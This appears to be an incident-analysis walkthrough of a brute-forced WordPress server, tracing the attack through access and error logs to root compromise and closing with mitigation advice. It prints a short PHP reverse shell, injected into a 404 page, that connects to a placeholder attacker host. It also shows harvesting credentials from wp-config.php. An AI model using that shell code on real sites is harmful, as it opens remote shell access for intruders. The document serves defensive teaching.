Hacked Web Server Analysis Example

Hacked Web Server Analysis: A Detailed Walkthrough

This analysis provides insights into how a WordPress-based web server was compromised and offers practical steps for detection, response, and prevention.

---

1. Brute Force Attack Detection on Admin Panel

Log Analysis

The attack begins with a brute force attempt on the WordPress login page (wp-login.php).

• Command:

  cat access.log | grep POST | grep wp-login

• Observation: The logs show numerous POST requests from the same IP (192.168.2.232), targeting wp-login.php. This indicates repeated login attempts.

  Example Log Entry:

  192.168.2.232 - - [12/Nov/2024:14:00:12 +0000] "POST /wp-login.php HTTP/1.1" 200 2456

Network Traffic Analysis

Wireshark confirms the brute force attack by filtering for POST requests to the server.

• Wireshark Filter:

  ip.src == 192.168.2.232 && http.request.method == POST

• Result: Multiple login attempts, eventually leading to successful credential discovery (admin:admin).

---

2. Exploitation via Admin Panel

Once logged in, the attacker exploits their access to upload malicious code and modify the 404 error page.

Error Log Analysis

The attacker’s activity is evident in the error logs.

• Command:

  cat error.log

• Key Entry:

  [12/Nov/2024:14:30:45 +0000] [error] [client 192.168.2.232] PHP Warning:  fscockopen() error in /words/test123123.php

This log suggests the attacker used the fsockopen() function for malicious purposes.

---

3. Malicious 404 Error Page

The attacker modifies the 404 error page to establish a reverse shell connection.

Injected Code:

<?php
$socket = fsockopen("ATTACKER_IP", 1234);
exec("/bin/bash -i <&3 >&3 2>&3");
?>

• Functionality:

  • Opens a connection to the attacker’s system.

  • Provides shell access with the www-data user’s privileges.

---

4. Escalation to Root Privileges

Reading Sensitive Configuration Files

The attacker reads the WordPress configuration file to extract database credentials.

• Command:

  cat /var/www/html/wp-config.php

• Critical Finding:

  define('DB_PASSWORD', 'rootpassword');

The database password is the same as the root user’s password, enabling privilege escalation.

Root Privilege Escalation

Using the compromised credentials, the attacker switches to the root user.

• Command:

  su root

• Full System Control: The attacker achieves root-level access, enabling unrestricted control.

---

5. Attack Steps

1. Brute Force Attack:

• Gained WordPress admin credentials (admin:admin) via brute force on wp-login.php.

2. Malicious Code Injection:

• Modified the 404 error page with a reverse shell script.

3. Credential Harvesting:

• Extracted database credentials from wp-config.php.

4. Privilege Escalation:

• Used database credentials to switch to the root account.

5. Root Compromise:

• Gained full control over the server.

---

Mitigation and Protection Strategies

1. Enforce Strong Credentials

• Use complex, unique passwords for:

  • WordPress admin accounts.

  • Database credentials.

  • Root accounts.

• Use password managers to prevent reuse and ensure strong password policies.

2. Limit Login Attempts

• Deploy plugins like Limit Login Attempts Reloaded.

• Automatically block IPs after multiple failed login attempts.

3. Regular Updates and Patches

• Update WordPress, plugins, and server software to address known vulnerabilities.

• Regularly monitor the WordPress Vulnerability Database.

4. Restrict Error Reporting

• Disable verbose error reporting to prevent sensitive information leakage:

  ini_set('display_errors', 0);
  ini_set('log_errors', 1);

5. Monitor Logs and Traffic

• Use centralized logging solutions like ELK Stack or Splunk.

• Implement Intrusion Detection Systems (IDS) to detect anomalous traffic in real time.

6. Principle of Least Privilege

• Ensure that WordPress and the web server run under non-root accounts.

• Avoid using the same password for different system components.

7. File Integrity Monitoring

• Use tools like Tripwire or OSSEC to monitor changes in critical files (e.g., 404.php).

8. Web Application Firewall (WAF)

• Deploy a WAF (e.g., Cloudflare or ModSecurity) to block:

  • Brute force attacks.

  • Malicious payloads.

  • Suspicious query strings (e.g., SQL Injection).

---

Conclusion

This incident underscores the importance of proactive security measures and continuous monitoring. A single weak point, such as a poorly secured admin panel, can lead to full system compromise. Implementing best practices, monitoring logs, and maintaining up-to-date software are critical for preventing similar attacks.